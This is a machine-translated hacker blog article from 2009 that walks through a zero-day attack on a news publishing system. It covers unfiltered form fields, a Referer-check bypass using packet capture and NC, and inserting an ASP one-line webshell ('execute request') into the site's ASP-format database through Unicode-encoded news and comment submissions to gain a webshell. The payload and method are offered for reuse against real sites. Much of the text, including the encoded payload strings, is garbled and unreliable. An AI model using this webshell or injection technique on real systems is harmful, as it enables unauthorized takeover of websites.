Title: let the LOOP anti-download useless take a direct shell-the analysis of boiling news multimedia Outlook system V1. 2 0Day Author: Mo if you are asked[B. H. S. T]& Lee, mi [L4nk0r] Source: L4nk0r'S Blog This article has been published in the hackers Handbook 2 0 0 9 in the 9th issue of the magazine, after the author posted on the blog, such as reproduced please retain this information
L4nk0r:to facilitate everyone to read, and finally provides a file package to download Things reasons: Summer vacation at home alone reading a book,browsing a website when the total feel of this website, the whole page is like a system. So it looked really boiling prospect news system. Remember to get up early this system to exist many loopholes. Not immediately to its official website to download the latest version V1. 2 Build1 version. This version relative to the previous version of the safety has improved a lot,but in reading the code in the process or discover some shortcomings to came and share,following the exploits of the form to do the following analysis,vulnerability itself is nothing,note ideas.
sex=request. form("sex") // here there is no any filtering,can be through a local submission of expression of birthyear=request. form("birthyear") //Ibid. birthmonth=request. form("birthmonth") // Ibid. birthday=request. form("birthday") depid=ChkRequest(request. form("depid"),1) 'anti-injection,used here ChkRequest()to prevent injection,follow-up photo=request. form("photo")
Obviously the above these parameters, in addition to a depid filter the other is the direct access and directly behind the updates to the database. We know Javascirpt can local submit a bypass,so the cross-site there is no problem. But in the test it was found no,well carefully review the files it contains,I understand the programmer why so”confident”. See ChkURL. asp,code is as follows:
server_v1=Cstr(Request. ServerVariables("HTTP_REFERER")) server_v2=Cstr(Request. ServerVariables("SERVER_NAME")) if mid(server_v1,8,len(server_v2))<>server_v2 then -------------------------------Behind a bunch of tips---------------------------------------
The use of REFERER prohibit local submission. Or old ideas,configured Referer. Here I through WinSock Expert capture and then NC to modify the data submitted. Here do not explain,of course this vulnerability with later use is also possible. II. Mortally wounded-<%loop<%useless take a direct shell 1. Cause analysis Directly open the database/data/news3000. asp database the default is asp format(believe that no webmaster will put it into the mdb). This is behind the use of the premise. We locally changed the mdb to open,found inside a table,as shown in Figure 1: ! [Highslide JS](http://www.l4nkor.org/read.php/attachment.php?fid=60) NotDownload the table,its contents are displayed as:”long binary data”,this is the table resulting in our Access database appears as shown in Figure 2 prompts: ! [Highslide JS](http://www.l4nkor.org/read.php/attachment.php?fid=61) The reason for the Loop is the asp in the loops,in fact in the database that the string long binary data is<%loop<%hexadecimal form 3C25206C6F6F70203C25. We can use UltraEdit in hex form to open it,then search for<%will be found as shown in Figure 3: ! [Highslide JS](http://www.l4nkor.org/read.php/attachment.php?fid=62) Know the asp syntax people see here should all understand why there would be Figure 2 prompt the. So when you insert the phrase when the script can not be closed problem. In addition<%loop<% this is not closed. The following is the key idea:since it cannot be closed,whether we can comment out? Thought of here,we'll think of single quotation marks,Yeah, that's it-the ASP comment character,but the premise is,to be able to before he inserted a<%’;x (i.e.,
Here x can be other characters,is for the later characters into the unicode encoding used.) In addition,also in the<%loop<%insert a%>x(here X is same)to make it and the front Insert of the closure. So that you can comment out the<%loop<%this impossible closure of the issue. We sort out ideas:is in
Before appropriate location for the insertion of a segment can be closed the code,and in this 2 The closed symbols in the middle of the content commented on. Ideas with..you can operate. Otherwise stated,when you use UltraEdit in hex form to open the database when search<%if not<%for loop in that,as evidenced here may be inserted before the position is closed identifier,Similarly,the rear closure identifier can also be determined. Clear thinking,we see examples of the operation. II. Examples of presentation-boiling prospect news system V1. 2 0day Open/data/news3000. asp database found,the ordinary user can add the data table has:
1. attach the table-the file upload mode 2. FT_User table --by registering(with the vulnerability 1 The registration of cross-site use) 3. Link table-link to application 4. News table --publishing news 5. Review the table --comment on the news 6. UploadPic table --upload images
┼Pay offs number 畣 whole 爠 Hwan enemy 瑳∨∣┩anger┼anvil
” Is through the lake2 written a2u4hack. exe tool to convert into Unicode encoding,it's prototype is:
<% execute request("#")%>a<%'x
,As shown in Figure 5: ! [Highslide JS](http://www.l4nkor.org/attachment.php?fid=64) Here we should note that in the conversion process can not appear?, This is me just why a x reasons. And then directly submitted,regardless of whether the administrator review does not affect. Again UltraEdit hex form to open the search<%found as shown in Figure 6: ! [Highslide JS](http://www.l4nkor.org/attachment.php?fid=65) The discovery of the first search is shown in Figure 6,that is has been successfully inserted into the pre-closure identifier. Now insert the just home the point of an article,click the below”comments”select visitor,and then the contents of that input as shown in Figure 7: ! [Highslide JS](http://www.l4nkor.org/attachment.php?fid=66) Content: “┠ gravel “similarly also after a2u4hack. exe tool coding,its prototype is: %>x so after Submit you can submit to the database and the perfect Comments Off
All the work is done we see the following results. As shown in Figure 8: ! [Highslide JS](http://www.l4nkor.org/attachment.php?fid=67) Successful insertion of the word Trojan,but also successfully links the direct get a WebShell. In addition. Of course, the program also has some shortcomings,interested friends can own mining. For this idea,when if you can not be so perfect insertion of the Trojans,whether we also thought by this method to filter out some of the upload suffix of the limitations of the data and then upload to get a webshell? Well,ideasSo,we flexible applications. The official demo site off a link,we don't do the test, after all just providing everyone an idea. This analysis ends here, for this vulnerability to harm larger,请 勿 做 非法 行为 . 有 任何 问题 可以 到 黑 手 论坛 与 我 讨论 或者 E-mail:firstname.lastname@example.org.